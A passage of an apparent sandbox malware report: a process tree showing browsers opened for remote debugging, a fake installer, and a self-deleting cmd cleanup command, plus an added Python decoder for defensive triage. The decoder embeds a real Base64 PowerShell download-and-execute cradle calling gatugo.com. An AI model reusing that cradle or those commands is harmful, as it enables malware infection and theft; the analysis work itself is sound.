C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:810⤵PID:276
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4280 /prefetch:810⤵PID:2088
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5208,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:810⤵PID:1696
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4668,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:210⤵
- Uses browser remote debugging
PID:1028
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"9⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5532 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff843d33cb8,0x7ff843d33cc8,0x7ff843d33cd810⤵PID:5548
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:210⤵PID:5748
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:310⤵
- Suspicious behavior: EnumeratesProcesses
PID:5756
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:810⤵PID:5772
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:110⤵
- Uses browser remote debugging
PID:5960
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:110⤵
- Uses browser remote debugging
PID:5968
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:210⤵PID:2260
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2384 /prefetch:210⤵PID:5164
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4108 /prefetch:210⤵PID:5236
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3884 /prefetch:210⤵PID:5300
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4544 /prefetch:210⤵PID:5368
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:110⤵
- Uses browser remote debugging
PID:648
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:110⤵
- Uses browser remote debugging
PID:5468
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:810⤵
- Suspicious behavior: EnumeratesProcesses
PID:3484
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:110⤵
- Uses browser remote debugging
PID:3056
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:110⤵
- Uses browser remote debugging
PID:4688
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit9⤵
- System Location Discovery: System Language Discovery
PID:2940 -
C:\Windows\SysWOW64\timeout.exetimeout /t 1010⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5416
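The stager at depth 4 of the tree above (PID 400) hides its downloader in a Base64 literal that PowerShell turns back into text with UTF8.GetString and runs with Invoke-Expression; its child (PID 4048) does the same with a case-mangled -encOdEdC switch, whose payload this page does not reproduce, so it is not decoded here. The Python below is an added example, not part of the sandbox report: it takes the PID 400 command line exactly as recorded in the tree, extracts the blob, decodes it and reports the URL, User-Agent and download-then-execute pattern inside. The helper names are this example's own, and the UTF-16LE branch in decode_payload is an assumption about how a practitioner would generalise the decoder to -EncodedCommand payloads, not something this sample's stager does.

```python
import base64
import re

# Command line of PID 400 exactly as recorded in the process tree on this page.
CRADLE_CMDLINE = r'''powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGY9J2h0dHBzOi8vZ2F0dWdvLmNvbS9oZWFsdGgucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtOZXQuU0VydkljRXBPSW50TUFOYWdlUl06OlNFY1VySXR5cHJvVG9Db2wgPSBbbkV0LlNFQ1VyaVRZUHJPVG9jT0x0eXBFXTo6VExTMTI7ICRnb2cgPSBpd3IgJGYgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkZ29nLkNvbnRlbnQ7')); Invoke-Expression $script}"'''

# Base64 literal handed to [Convert]::FromBase64String('...') inside a command line.
B64_ARG_RE = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.IGNORECASE)
# Indicators pulled out of the decoded script.
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
UA_RE = re.compile(r"-UserAgent\s+'([^']+)'", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.IGNORECASE)
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)


def extract_base64_args(cmdline: str) -> list:
    """Return every Base64 literal passed to FromBase64String in a command line."""
    return B64_ARG_RE.findall(cmdline)


def decode_payload(b64: str) -> str:
    """Decode one PowerShell Base64 blob to script text.

    This stager used [Text.Encoding]::UTF8.GetString, so the bytes are UTF-8.
    A -EncodedCommand payload is UTF-16LE instead; ASCII script text in UTF-16LE
    has a NUL as every second byte, which is used here to pick the decoding
    (an assumption of this example, not behaviour taken from the sample).
    """
    padded = b64 + "=" * (-len(b64) % 4)      # tolerate stripped '=' padding
    raw = base64.b64decode(padded)
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def triage(cmdline: str) -> dict:
    """Decode every embedded blob and summarise the indicators it contains."""
    result = {"scripts": [], "urls": [], "user_agents": [], "download_and_execute": False}
    for blob in extract_base64_args(cmdline):
        script = decode_payload(blob)
        result["scripts"].append(script)
        result["urls"].extend(URL_RE.findall(script))       # stops at the quote, so the
        result["user_agents"].extend(UA_RE.findall(script))  # $env:computername suffix is not captured
        if DOWNLOAD_RE.search(script) and EXEC_RE.search(script):
            result["download_and_execute"] = True
    return result


if __name__ == "__main__":
    summary = triage(CRADLE_CMDLINE)
    for script in summary["scripts"]:
        print(script)
    print("urls:", summary["urls"])
    print("user agents:", summary["user_agents"])
    print("download-and-execute:", summary["download_and_execute"])
```

Run stand-alone it prints the decoded cradle, which builds https://gatugo.com/health.php?compName= plus the hostname, forces TLS 1.2, fetches the page with a spoofed Chrome 81 User-Agent and passes the response body to iex. The randomised casing of the .NET type names ([Net.SErvIcEpOIntMANageR], [nEt.SECUriTYPrOToCOLtypE]) survives the decode and is itself a useful hunting string; the host name matches the pan*.zip download URLs listed under Malware Config at the top of the report.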
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:3440
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4764
C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\Installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1731192677 " AI_EUIMSI=""2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:1064
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:760
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:3320
C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\Installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1731192677 " AI_EUIMSI=""2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:3088
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:276
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2420
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1856
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:5280
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5308 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53b2cfa3-c6dc-4459-a3f0-989b7d44a8a4} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" gpu3⤵PID:1204
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2376 -parentBuildID 20240401114208 -prefsHandle 2360 -prefMapHandle 2356 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf096397-6ba0-45a4-8a9e-c0b5a4490a82} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" socket3⤵
- Checks processor information in registry
PID:6048
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2972 -childID 1 -isForBrowser -prefsHandle 1460 -prefMapHandle 3024 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae277e4c-48a9-45e7-bd73-afbae7f58b77} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab3⤵PID:5768
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3396 -childID 2 -isForBrowser -prefsHandle 3416 -prefMapHandle 3412 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {714733b9-c3ab-4c06-adda-0a34bb7a595c} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab3⤵PID:5632
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4196 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4188 -prefMapHandle 4184 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c22a62d8-e529-4418-b3df-2dcf3cfe647b} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" utility3⤵
- Checks processor information in registry
PID:5884
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5332 -childID 3 -isForBrowser -prefsHandle 5324 -prefMapHandle 5276 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bd6f89e-dbe5-4c19-a396-e284d6039265} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab3⤵PID:3928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 4 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0511404-fdd5-425a-b668-5e0171001ab3} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab3⤵PID:1592
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5744 -childID 5 -isForBrowser -prefsHandle 5664 -prefMapHandle 5668 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49d3de85-8fc8-44b0-8638-bfadee068132} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab3⤵PID:4888
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:4876 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff84424cc40,0x7ff84424cc4c,0x7ff84424cc582⤵PID:2416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2040,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2036 /prefetch:22⤵PID:1888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1756,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:32⤵PID:1356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1732,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2232 /prefetch:82⤵PID:4700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:12⤵PID:2676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:5588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4404,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4388 /prefetch:12⤵PID:1980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4564,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4556 /prefetch:82⤵PID:888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4544,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:82⤵PID:1544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4584,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:12⤵PID:5512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3380,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:12⤵PID:4908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3392,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3356 /prefetch:82⤵PID:5492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4552,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3448 /prefetch:82⤵
- Modifies registry class
PID:4576
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:736
Network
MITRE ATT&CK Enterprise v15
Persistence
